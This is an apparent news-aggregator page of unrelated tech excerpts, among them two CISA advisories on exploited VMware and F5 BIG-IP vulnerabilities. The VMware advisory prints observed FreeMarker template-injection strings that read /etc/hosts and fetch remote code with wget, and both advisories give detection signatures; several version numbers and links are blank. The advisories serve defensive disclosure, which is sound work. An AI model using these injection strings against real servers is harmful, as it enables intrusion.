The NonNullable type is a utility type in TypeScript that creates a new type, whilst removing all null or undefined elements. It lets us take existing types, and modify them so they are more suitable in certain situations. Let’s look at how it works.

Custom Types

This article covers custom types. To learn more about custom types, read my guide about it here.

Source de l’article sur DZONE

Every day design fans submit incredible industry stories to our sister-site, Webdesigner News. Our colleagues sift through it, selecting the very best stories from the design, UX, tech, and development worlds and posting them live on the site.
The best way to keep up with the most important stories for web professionals is to subscribe to Webdesigner News or check out the site regularly. However, in case you missed a day this week, here’s a handy compilation of the top curated stories from the last seven days. Enjoy!”

Exciting New Tools for Designers, May 2022

HTMLrev – 50 Beautiful HTML Landing Page Templates Library

Cool Hover Effects that Use CSS Text Shadow

Designers’ Pick: Top Color Trends for 2022

:Where() :Is() :Has()? New CSS Selectors that Make your Life Easier

The Era of Rebellious Web Design is Here

Bootstrap 5.2.0 Beta

OptimizeImages Free Bulk Image Optimizer

2022 Craft Beer Branding and Package Design Trends

3D Avatar Library – Hundreds of 3D Avatars for your Designs – Shrink the Size of your Images for Free

The WHY of Accessibility


The post Popular Design News of the Week: May 16, 2022 – May 22, 2022 first appeared on Webdesigner Depot.

Source de l’article sur Webdesignerdepot

In part 1, we introduced Instancio and how it can be used to automate data setup in unit tests. To recap, Instancio is a library that automates data setup in unit tests, with the goal of reducing manual data setup. More specifically, it accepts a class (or a « type token ») as an argument and returns a fully-populated instance of the class. Sticking to our Person class for all our examples, this can be done as follows:



Person person = Instancio.create(Person.class); Map<UUID, Person> person = Instancio.create(new TypeToken<Map<UUID, Person>>() {});

Source de l’article sur DZONE

WordPress has made it easy for everyone to launch a blog, but even though launching a blog isn’t a difficult task any longer, driving traffic to your blog certainly is!

In this article, I’ll share some tried and tested strategies that have worked well for my clients’ blogs. You do not have to be an expert or a marketing guru to get traffic to your WordPress website. Follow the helpful tips I share in this article and watch the visitors start pouring in.

Tip 1: Use Powerful Headlines

The first thing related to your blog that a user reads in the search engine results is your article headlines. Of course, nobody wants to click on a boring article title. But a powerful headline stands out from the rest and gets you more clicks. 

In most themes, your article headlines are translated into meta titles for the pages. Meta titles indicate the topic of your articles to Google and other search engines. 

Tip 2: Build an Email List

Consider offering your visitors a newsletter signup form through which they can subscribe and get notified about new posts on your blog. You can offer them an incentive for free to persuade them to subscribe to your blog. It can be anything from an e-book, membership, useful templates, or an e-course. 

Building an email list gives access to the inboxes of your visitors. You can share your blog content with this prospective audience every time you post a new article. This will help you get consistent traffic to your WordPress blog.

Tip 3: Use Free Giveaways and Contests

Free giveaways work as an incentive for your WordPress blog visitors. To offer an entry to your blog’s free giveaway, you can ask your visitors for an email subscription, comment on your blog posts, share it on their social media channels, and ask for other such things. 

The trick is to think about the actions of your visitors that will increase traffic to your blog and provide them with one or multiple giveaway entries for such actions. 

Tip 4: Optimize For Keywords

All successful bloggers optimize their content for keywords. You need to perform proper keyword research to find sentences and words that your target audience is typing in Google and other top search engines. 

Instead of guessing the keywords for your articles, consider using some helpful tools like SEMrush’s Keyword Magic Tool and Google Ads Keyword Planner. This way, you can find the terms people are genuinely interested in and the keywords that do not have too much competition.

You must ensure to choose the keywords that have some excellent traffic volume but, at the same time, have less competition. Such keywords will help in the better ranking of each of your articles.

Tip 5: Optimize WordPress Site Speed

It has been proven that loading time is a ranking factor for SEO, as Google tends to assume that fast sites are high-quality sites.

Signing up for a hosting provider specializing in WordPress guarantees you get the best optimization features for your WordPress site. However, that alone is not enough because you need a hosting provider that can also handle a high volume of visitors.

Optimizing your WordPress website will help in the faster loading of your blog pages. Images are generally the biggest culprit in slowing down your website. So you must first optimize them through an image optimization plugin like Smush, Imagify, or Optimus. 

Enabling caching on your WordPress blog will considerably improve its speed. You can store your website data locally with caching, thereby reducing your server load to a large extent. Your website will, therefore, load faster on your visitors’ end, especially when they are repeat visitors.

Tip 6: Take Advantage of Social Media

Try building your presence on some of the top platforms like Facebook, Instagram, Twitter, LinkedIn, and Pinterest. Post multiple times a day on these websites and share your blog articles.

You must also include social sharing buttons with your blog posts to make sharing easier for your audience. It will allow your blog visitors to share your post on different social platforms. This dramatically increases the chances of your blog post going viral.

Tip 7: Internal Linking Strategy

The only key here is to link articles that are closely related to each other. Your visitors might be interested in such related content and read more of your blog posts, thereby increasing your page views. It also increases the chances of visitors sharing your blog content since they find it valuable.

Tip 8: Be a Guest Blogger

Guest blogging involves creating content for other websites for mutual benefits. It helps you establish your authority in the blogging world while attracting more visitors to your WordPress website. 

Becoming a guest blogger allows you to spread the word about your blog to a new set of audiences and bring in organic traffic. It expands your work portfolio and helps build or enhance your online reputation.

Tip 9: Pay for Traffic

Consider using Google Ads, Facebook Ads, Microsoft advertising, and other top advertising platforms when paying to bring traffic to your blog. Be aware of your blog audience and use the most suitable criteria to target it. 

I’d recommend setting a weekly budget for paid ads and tracking the ad performance at the end of the week.

If you are satisfied with the traffic results, use the same criteria for the next week. On the other hand, if the ad performance is not as per your expectations, try different criteria to reach your target audience.


Getting traffic to your WordPress blog is an incentive for all the hard work that you do in creating content and managing your website. It builds a name for your blog and improves its search engine ranking. All this leads to better user engagement and revenue.


Featured image via Pexels.


The post 9 Ways To Drive Traffic To Your WordPress Blog first appeared on Webdesigner Depot.

Source de l’article sur Webdesignerdepot

The 2021 RT-Thread IoT OS Tech Conference has 1500+ developers registered for the conference, over 20 topics were shared, featured on the open-source RT-Thread OS projects and the new development RT-Smart Micro-Kernel OS, RISC-V ecosystems and associated manufacturers introduced, STM32 ecosystems, embedded projects showcase, IoT security, trending technical knowledge such as AI, ROS, Rust, Micropython, and more!

The 2022 RT-Thread IoT OS Global Tech Conference will continue kicking off with unique insights, exciting innovative technologies, inspiring projects showcases.

Source de l’article sur DZONE

“At regular intervals, the team reflects on how to become more effective, then tunes and adjusts its behavior accordingly” — Agile Manifesto

Self-reflection within teams is fundamental to enabling Agile ways of working. Let’s take the most common Agile methodology, Scrum. This framework prescribes five events, one of which is the retrospective.

Source de l’article sur DZONE

Original release date: May 18, 2022 | Last revised: May 19, 2022


The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory (CSA) to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Exploiting these vulnerabilities permits malicious actors to trigger a server-side template injection that may result in remote code execution (RCE) (CVE-2022-22954) or escalation of privileges to root (CVE-2022-22960). 

VMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of Known Exploited Vulnerabilities on April 14 and April 15, respectively. In accordance with Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5, and May 6, 2022, respectively

Note: based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released, Emergency Directive (ED) 22-03 Mitigate VMware Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in VMware Security Advisory VMSA-2022-0014 or remove the affected software from their network until the updates can be applied.

CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information—including indicators of compromise (IOCs)—about observed exploitation at multiple other large organizations from trusted third parties.

This CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. Due to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with affected VMware products that are accessible from the internet—that did not immediately apply updates—to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.

Download the PDF version of this report (pdf, 232kb).

For a downloadable copy of IOCs, see AA22-138B.stix

Technical Details

CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.

  • CVE-2022-22954 enables an actor with network access to trigger a server-side template injection that may result in RCE. This vulnerability affects the following products:[1]
    • VMware Workspace ONE Access, versions,,,
    • vIDM versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
    • VMware Cloud Foundation, 4.x
    • vRealize Suite LifeCycle Manager, 8.
  • CVE-2022-22960 enables a malicious actor with local access to escalate privileges to root due to improper permissions in support scripts. This vulnerability affects the following products:[2]
    • VMware Workspace ONE Access, versions,,,
    • vIDM, versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
    • vRA, version 7.6 
    • VMware Cloud Foundation, 3.x, 4.x, 
    • vRealize Suite LifeCycle Manager, 8.x

According to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. The actor then exploited CVE-2022-22960 to escalate the user’s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems.

Threat actors have dropped post-exploitation tools, including the Dingo J-spy webshell. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. Note: analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.

Detection Methods


Note: servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption can be used as a workaround for network-based detection and threat hunting efforts.

The following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954:

alert tcp any any -> any $HTTP_PORTS (msg: »VMware:HTTP GET URI contains ‘/catalog-portal/ui/oauth/verify?error=&deviceUdid=’:CVE-2022-22954″; sid:1; rev:1; flow:established,to_server; content: « GET »; http_method; content: »/catalog-portal/ui/oauth/verify?error=&deviceUdid= »; http_uri; reference:cve,2022-22954; reference:url,; reference:url,; priority:2; metadata:service http;)

The following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:

10000001alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg: »Workspace One Serverside Template Injection »;content: »GET »; http_method; content: »freemarker.template.utility.Execute »;nocase; http_uri; priority:1; sid:;rev:1;)

The following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:

rule dingo_jspy_webshell
$string1 = « dingo.length »
$string2 = « command = command.trim »
$string3 = « commandAction »
$string4 = « PortScan »
$string5 = « InetAddress.getLocalHost »
$string6 = « DatabaseManager »
$string7 = « ExecuteCommand »
$string8 = « var command = form.command.value »
$string9 = « »
$string10 = « J-Spy ver »
$string11 = « no permission ,die »
$string12 = « int iPort = Integer.parseInt »
filesize < 50KB and 12 of ($string*)

Note: the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.

Behavioral Analysis and Indicators of Compromise

Administrators should conduct behavioral analysis on root accounts of vulnerable systems by:

  • Using the indicators listed in table 1 to detect potential malicious activity.
  • Reviewing systems logs and gaps in logs.
  • Reviewing abnormal connections to other assets.
  • Searching the command-line history.
  • Auditing running processes.
  • Reviewing local user accounts and groups.  
  • Auditing active listening ports and connections.


Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960



IP Addresses


On or around April 12, 2022, malicious cyber actors may have used this German-registered IP address to conduct the activity. However, the actors may have used the Privax HMA VPN client to conduct operations.

Scanning, Exploitation Strings, and Commands Observed




portal/ui/oauth/verify?error=&deviceUdid=${« freemarker.template.utility.Execute »?new()(« cat  /etc/hosts »)}  



portal/ui/oauth/verify?error=&deviceUdid=${« freemarker.template.utility.Execute »?new()(« wget  -U « Hello 1.0″ -qO – http://[REDACTED]/one »)} 



Search for this function in:



freemarker.template.utility.Execute may be legitimate but could also indicate malicious shell commands.


Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.


Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.


Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.



Found in /usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib: 


Found in /usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib: 








Incident Response

If administrators discover system compromise, CISA recommends they:

  1. Immediately isolate affected systems. 
  2. Collect and review relevant logs, data, and artifacts.
  3. Consider soliciting support from a third-party incident response organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
  4. Report incidents to CISA via CISA’s 24/7 Operations Center ( or 888-282-0870)


CISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in ED 22-03 Mitigate VMware Vulnerabilities, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy updates in VMware Security Advisory VMSA-2022-0014 or to remove the affected software from the agency network until the updates can be applied.


Contact Information

CISA encourages recipients of this CSA to report incidents to CISA via CISA’s 24/7 Operations Center ( or 888-282-0870)



  • Initial Version: May 18, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

Source de l’article sur

The term “web design” refers to the process of planning, organizing, and editing content online. On the surface, it seems like a simple enough concept. However, the reality is what we consider “web design” can change over time, influenced by our perception of the “web.” 

In 2022, a professional web designer might create custom websites from scratch, but they may also be responsible for: 

  • UX Design: Creating elements focused on user experience
  • App design: Building digital components of a website or online experience.
  • Theme design: Creating visual tools for supplementing web design. 

Web design isn’t just about making a site look attractive anymore. The definition goes beyond the aesthetic to include a complete consideration of the functionality, performance, and abilities of countless assets we engage within the digital world.

What is Web Design? The Definition Today

Web design is the practice responsible for creating a website’s overall look and feel or web asset (such as web and mobile apps). It involves the process of planning and building elements of your project, from structure and layout choices to graphics and presentation. 

Web design has various components that work together to create the final “experience” of a website, including graphic design, interface design, user experience design, search engine optimization, content creation, etc. These elements determine how a web asset looks, feels and performs on various devices. 

Though the definition of web design in 2022 has evolved, it’s still different from web development, which refers to the actual coding which makes a website work. When you’re building a website, you’ll need web design and web development. 

Elements of Web Design in 2022 

When designing a website, modern designers need to consider two overlapping concepts: the overall appearance of the website and its functionality. The proper connection between these elements will maximize the site’s overall performance and usability, and make a design more memorable (for all of the right reasons). 

Let’s break down the elements of web design into its visual and functional components.

Visual Elements of Web Design

Visual elements of web design influence how a design looks. The various visual components of a design should still follow the basic principles of graphic design. In other words, designers should be thinking about contrast, balance, unity, and alignment simultaneously. The visual elements of web design include: 

  • Written copy and fonts: A website’s appearance and the text on the site often go hand in hand. Designers need to work together with content writers to ensure written copy makes sense structurally and uses the correct fonts for legibility. 
  • Colors: Colors for web design are usually chosen based on factors like color psychology, which demonstrates a color’s ability to affect how someone feels, and branding. Most brands have specific colors they use consistently throughout their visual assets; this helps create a sense of cohesion and unity in designs.
  • Layout and spacing: Layout and spacing influence how content is arranged in an app, website, or another visual asset. The right layout helps to create a visual hierarchy, guiding a viewer through a page and drawing their attention to the correct information in order. Spacing helps to separate components on a page and create legibility. 
  • Images, icons, and shapes: Images, icons, and shapes help convey significant amounts of information. The right ideas and icons can strengthen a brand message, direct a customer’s attention using a web app, and bring context to a design. 
  • Videos and animations: Videos and animations are becoming increasingly common in today’s web design strategies. Videos can include 360-degree videos, which help immerse someone in a space, video streams, and short content clips.

Functional Elements of Web Design

Functional elements in web design are the practical components designers need to consider to ensure websites and assets work as they’re supposed to. A website, app, or any other web asset needs to function correctly to be accessible to users.

Functional elements of web design may include:

  • Navigation: The navigation elements of a website or app are among the main components determining whether a site is functioning properly and ensuring a good user experience. Audiences need to be able to move around the app or website quickly. 
  • User interactions: Your site visitors may have multiple ways of communicating with your web app or website, depending on their device. You’ll need to make sure people can scroll and swipe on smartphones and tablets and click on desktops. If your website has VR or AR elements, you’ll also need to consider these immersive components in your design.
  • Speed and performance: While web development elements can also influence a web design’s speed or performance, it’s also essential for a designer to show elements of the composition don’t weigh down the functionality. Designs need to load quickly and correspond with the demands of browsers on various devices.
  • Structure: A website’s structure plays a critical role in user experience and SEO requirements. Users need to easily navigate through a website without encountering any issues like getting lost or ending up on broken pages.
  • Compatibility: A good design should look perfect on all devices, from a wide range of browsers to the various devices users might leverage today. 

What Does Good Web Design Look Like in 2022?

More than ever, achieving high-quality web design is crucial to success in any industry or landscape. More than half of the world’s population is active online. If you’re not appealing to this audience correctly, you’re missing out on endless opportunities.

Notably, while elements of good web design can be subjective, such as which themes or colors someone might prefer for their website, the underlying foundations of strong web design are the same for everyone in 2022.  

Good web design is any design that looks good, performs as it should, and delivers the best possible experience to your target audience. Effective web design should include components like:

  • Effective use of white space for organization and structure.
  • Clearly presented choices and navigation options for the user.
  • Clear calls to action to drive user activities from one page to another.
  • Limited distractions and a straightforward user journey. 
  • No clutter or unnecessary components irrelevant to the needs of the user. 
  • Responsive, flexible design accessible on any browser or device.
  • High-quality content and images are designed to hook a reader’s attention.
  • Appropriately sized fonts and legible typography.
  • A good balance between images and text on a page. 

Other elements like eye-catching imagery and professional photography can help your web design stand out. Using the right building blocks, like a strong color palette and the right shapes or icons in your design is helpful. 

Of course, there is some scope for variation in good web design. A web designer in 2022 needs to be able to adapt their use of the various essential elements of design to suit a specific target audience or the unique identity of a brand.

What Doesn’t Work for Web Design in 2022?

Just as web design elements seem to appear consistently in all excellent examples, there are also parts of web design we’ve left behind over the years. Simpler, more straightforward designs have replaced cluttered spaces, flashing images, and endless animations. 

The focus in 2022 is on creating an experience that’s simple, engaging, and intuitive, capable of speaking to the right audience without confusion or being visually overwhelming. In most cases, some of the top components to avoid include:

  • Clunky performance: Non-responsive website design, slow pages, and other examples of clunky functionality are a no-go in 2022. Websites need to be quick and responsive.
  • Distracting content: Flashing images, animations, and complex backgrounds are a thing of the past for a good reason. Websites today need to be clean, simple, and clear. Any elements which don’t add to the value of the design should be removed.
  • Generic content: Filler text, irrelevant stock photos, unclear buttons, and links can be removed from today’s website designs. A web design should be specific to the audience’s needs and the brand’s identity. Generic components don’t work.

Creating Web Designs in 2022

Today, the underlying definition of web design has a lot of similarities to the definition we’ve known for several years already. Creating a great website or web asset still requires focusing on user experience, aesthetic appeal, and functionality. However, today’s web designers generally have more components and different devices. 

Web design in 2022 is about creating high-quality experiences for customers that can support various environments and devices. The best web designs are aesthetically appealing, functionally reliable, and capable of adhering to the latest trends in web creation, like augmented reality, 360-degree video, and ultra-high resolution. 


Featured image via Pexels.


The post What Even Is Web Design in 2022? first appeared on Webdesigner Depot.

Source de l’article sur Webdesignerdepot

Companies in virtually all industries use the information to some extent. Often, most of an organization’s operations revolve around collecting and analyzing it. Of course, most people in modern society know and accept that, but they assert that businesses must do whatever’s necessary to keep data safe. 

Recent data privacy report statistics show a high demand for people who have the training to keep information secure. As a result, they often have multiple offers to the field, even though statistics about the U.S. job market indicate the per-month growth may be becoming less robust.

Source de l’article sur DZONE

Original release date: May 18, 2022


Actions for administrators to take today:
• Do not expose management interfaces to the internet.
• Enforce multi-factor authentication.
• Consider using CISA’s Cyber Hygiene Services.

The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2022-1388. This recently disclosed vulnerability in certain versions of F5 Networks, Inc., (F5) BIG-IP enables an unauthenticated actor to gain control of affected systems via the management port or self-IP addresses. F5 released a patch for CVE-2022-1388 on May 4, 2022, and proof of concept (POC) exploits have since been publicly released, enabling less sophisticated actors to exploit the vulnerability. Due to previous exploitation of F5 BIG-IP vulnerabilities, CISA and MS-ISAC assess unpatched F5 BIG-IP devices are an attractive target; organizations that have not applied the patch are vulnerable to actors taking control of their systems.

According to public reporting, there is active exploitation of this vulnerability, and CISA and MS-ISAC expect to see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks. CISA and MS-ISAC strongly urge users and administrators to remain aware of the ramifications of exploitation and use the recommendations in this CSA—including upgrading their software to fixed versions—to help secure their organization’s systems against malicious cyber operations. Additionally, CISA and MS-ISAC strongly encourage administrators to deploy the signatures included in this CSA to help determine whether their systems have been compromised. CISA and MS-ISAC especially encourage organizations who did not patch immediately or whose F5 BIG-IP device management interface has been exposed to the internet to assume compromise and hunt for malicious activity using the detection signatures in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA.

Download the PDF version of this report (pdf, 500kb).

Technical Details

CVE-2022-1388 is a critical iControl REST authentication bypass vulnerability affecting the following versions of F5 BIG-IP:[1]

  • 16.1.x versions prior to 
  • 15.1.x versions prior to 
  • 14.1.x versions prior to 
  • 13.1.x versions prior to 13.1.5 
  • All 12.1.x and 11.6.x versions

An unauthenticated actor with network access to the BIG-IP system through the management port or self IP addresses could exploit the vulnerability to execute arbitrary system commands, create or delete files, or disable services. F5 released a patch for CVE-2022-1388 for all affected versions—except 12.1.x and 11.6.x versions—on May 4, 2022 (12.1.x and 11.6.x versions are end of life [EOL], and F5 has stated they will not release patches).[2]

POC exploits for this vulnerability have been publicly released, and on May 11, 2022, CISA added this vulnerability its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. Due to the POCs and ease of exploitation, CISA and MS-ISAC expect to see widespread exploitation of unpatched F5 BIG-IP devices in government and private networks. 

Dection Methods

CISA recommends administrators, especially of organizations who did not immediately patch, to:

  • See the F5 Security Advisory K23605346 for indicators of compromise. 
  • See the F5 guidance K11438344 if you suspect a compromise. 
  • Deploy the following CISA-created Snort signature:
alert tcp any any -> any $HTTP_PORTS (msg:”BIG-IP F5 iControl:HTTP POST URI ‘/mgmt./tm/util/bash’ and content data ‘command’ and ‘utilCmdArgs’:CVE-2022-1388”; sid:1; rev:1; flow:established,to_server; flowbits:isnotset,bigip20221388.tagged; content:”POST”; http_method; content:”/mgmt/tm/util/bash”; http_uri; content:”command”; http_client_body; content:”utilCmdArgs”; http_client_body; flowbits:set,bigip20221388.tagged; tag:session,10,packets; reference:cve-2022-1388; reference:url,; priority:2; metadata:service http;)

Additional resources to detect possible exploitation or compromise are identified below:

  • Emerging Threats suricata signatures. Note: CISA and MS-ISAC have verified these signatures are successful in detection of both inbound exploitation attempts (SID: 2036546) as well as post exploitation, indicating code execution (SID: 2036547).
    • SID 2036546
alert http $HOME_NET any -> $EXTERNAL_NET any (msg: »ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass (CVE 2022-1388) M1″; flow:established,to_server; content: »POST »; http_method; content: »/mgmt/tm/util/bash »; http_uri; fast_pattern; content: »Authorization|3a 20|Basic YWRtaW46″; http_header; content: »command »; http_client_body; content: »run »; http_client_body; distance:0; content: »utilCmdArgs »; http_client_body; distance:0; http_connection; content: »x-F5-Auth-Token »; nocase; http_header_names; content:! »Referer »; content: »X-F5-Auth-Token »; flowbits:set,ET.F5AuthBypass; reference:cve,2022-1388; classtype:trojan-activity; sid:2036546; rev:2; metadata:attack_target Web_Server, created_at 2022_05_09, deployment Perimeter, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2022_05_09;
  • SID SID 2036547
alert http $HOME_NET any -> any any (msg: »ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Server Response (CVE 2022-1388) »; flow:established,to_client; flowbits:isset,ET.F5AuthBypass; content: »200″; http_stat_code; file_data; content: »kind »; content: »tm|3a|util|3a|bash|3a|runstate »; fast_pattern; distance:0; content: »command »; distance:0; content: »run »; distance:0; content: »utilCmdArgs »; distance:0; content: »commandResult »; distance:0; reference:cve,2022-1388; classtype:trojan-activity; sid:2036547; rev:1; metadata:attack_target Web_Server, created_at 2022_05_09, deployment Perimeter, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2022_05_09;)


Incident Response 

If an organization’s IT security personnel discover system compromise, CISA and MS-ISAC recommend they:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Provision new account credentials.
  4. Limit access to the management interface to the fullest extent possible.
  5. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
  6. Report the compromise to CISA via CISA’s 24/7 Operations Center ( or 888-282-0870). State, local, tribal, or territorial government entities can also report to MS-ISAC ( or 866-787-4722).

See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA and MS-ISAC also encourage government network administrators to see CISA’s Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail steps for both incident and vulnerability response. 


CISA and MS-ISAC recommend organizations:

  • Upgrade F5 BIG-IP software to fixed versions; organizations using versions 12.1.x and 11.6.x should upgrade to supported versions. 
  • If unable to immediately patch, implement F5’s temporary workarounds:
    • Block iControl REST access through the self IP address.
    • Block iControl REST access through the management interface.
    • Modify the BIG-IP httpd configuration. 

See F5 Security Advisory K23605346 for more information on how to implement the above workarounds. 

CISA and MS-ISAC also recommend organizations apply the following best practices to reduce risk of compromise:

  • Maintain and test an incident response plan.
  • Ensure your organization has a vulnerability program in place and that it prioritizes patch management and vulnerability scanning. Note: CISA’s Cyber Hygiene Services (CyHy) are free to all SLTT organizations and public and private sector critical infrastructure organizations:
  • Properly configure and secure internet-facing network devices.
    • Do not expose management interfaces to the internet.
    • Disable unused or unnecessary network ports and protocols.
    • Disable/remove unused network services and devices.
  • Adopt zero-trust principles and architecture, including:
    • Micro-segmenting networks and functions to limit or block lateral movements.
    • Enforcing multifactor authentication (MFA) for all users and VPN connections.
    • Restricting access to trusted devices and users on the networks.



  • Initial Version: May 18, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

Source de l’article sur